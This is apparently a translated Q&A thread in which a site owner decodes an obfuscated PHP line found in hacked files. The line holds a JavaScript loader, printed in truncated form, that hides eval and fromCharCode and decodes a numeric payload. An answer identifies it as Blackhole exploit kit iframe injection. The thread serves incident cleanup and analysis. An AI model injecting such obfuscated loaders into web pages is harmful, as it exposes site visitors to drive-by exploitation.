我在各种.php文件中发现了几次echo(gzinflate(base64_decode("....."),我很好奇它到底做了什么。我想我设法使用引号中的文本解码base64 -d < fileetje.b64 > fileetje.gz其中 fileetje.b64 包含字符串数据。但是当我随后尝试对 fileetje.gz 进行枪压缩时,它报告了错误的数据。同样在做file fileetje.gz时,它说data,我希望GZIP的数据是类似的。
如何从 Linux 命令行解密数据?
像 http://www.base64online.com/这样的在线解码器也无法理解代码。将字符串数据也添加到问题中是否安全?
更新:我即兴制作了一个php脚本,因为它只是一个简单的回声(Thnx:glglgl)。结果是这样的:
<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48...............
它的结尾是:
...........9~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=563;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>
嵌入式JavaScript遵循黑洞漏洞利用工具包的格式。它注入了一个iFrame,导致你被利用,这可能是个坏消息。认为echo()(如上文评论中所述)将是安全的是不正确的。该功能只是将嵌入的恶意软件代码放入您的页面以造成损害。
相关文章:我的wordpress网站被黑客入侵了,有人告诉这个代码是做什么的吗?
SO 关于它如何工作的文章:这个 JavaScript 黑客的目的是什么?
相关信息:
http://johnbatchelorshow.com/jb/2012/01/lessons-learned-from-the-hacking-black-hole-exploit-kit/
http://nakedsecurity.sophos.com/2012/03/29/exploring-the-blackhole-exploit-kit/